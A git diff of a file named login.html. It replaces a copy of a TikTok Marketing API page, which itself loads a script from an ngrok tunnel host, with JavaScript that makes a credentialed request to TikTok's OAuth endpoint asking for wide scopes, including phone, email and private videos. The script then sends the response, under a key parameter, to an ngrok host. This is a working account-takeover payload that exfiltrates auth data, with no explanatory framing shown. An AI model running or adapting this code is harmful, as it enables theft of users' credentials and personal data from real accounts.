--- a/login.html
+++ b/login.html
@@ -1,21 +1,10 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-  <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width,initial-scale=1">
-  <meta http-equiv="X-UA-Compatible" content="ie=edge">
-  <script defer="defer" src="https://a03b-140-213-161-89.ngrok.io/test.html"></script>
-  <title>
-    TikTok Marketing API
-  </title>
-  
-<link rel="icon" href="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/favicon.ico?fb0789609ad476173bfa"><link href="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/css/1.e669ef2a2984d4d025f0.css?fb0789609ad476173bfa" rel="stylesheet"><link href="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/css/39.78c1a75c9a9d28d452a4.css?fb0789609ad476173bfa" rel="stylesheet"><link href="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/css/0.3cfdd121fac52afe041e.css?fb0789609ad476173bfa" rel="stylesheet"><link href="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/css/apiplatform.84eb4abcc28dd94d6c91.css?fb0789609ad476173bfa" rel="stylesheet"></head>
-<body>
-  <div style="display: none">8ebaad354167a3a7c8ab988318273cd1cc6491f2</div>
-  <div id="app"></div>
-  <script type="text/javascript">
-    window.PAGE_NAME = "apiplatform"
-  </script>
-  
-<script src="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/js/elementui.8ad9572bf34befcefa12.js?fb0789609ad476173bfa"></script><script src="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/js/bui.51bd5fe94266e77ffca6.js?fb0789609ad476173bfa"></script><script src="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/js/vendor.16b3b4ed0de3ed183afb.js?fb0789609ad476173bfa"></script><script src="https://sf16-scmcdn-sg.ibytedtos.com/goofy/ads/marketing_api/js/apiplatform.247c081c7bcd552ca0df.js?fb0789609ad476173bfa"></script></body>
-</html>
+var xhr = new XMLHttpRequest();
+xhr.onload = reqListener; 
+xhr.open("POST", "https://www.tiktok.com/passport/open/web/auth/?client_key=aw8cb3204x0a1g88&scope=user.info.basic%2Cuser.info.phone%2Cvideo.list.manage%2Ccomment.list%2Clive.list%2Cvideo.list.private_ads.no_watermark%2Cuser.account.configure%2Cuser.info.showcase%2Cuser.info.email%2Cvideo.list.no_watermark%2Ccomment.list.manage&aid=1459&source=web&redirect_uri=https%3a%2f%2fads.tiktok.com%2fblablablabla&state=64588d019065e001fa8e7abdd884581c10770400");
+xhr.withCredentials = true;
+xhr.setRequestHeader("Content-Type", "text/javascript");
+xhr.send();
+
+function reqListener() {
+    location='//e5cc-202-162-37-174.ngrok-free.app/log?key='+this.responseText; 
+};
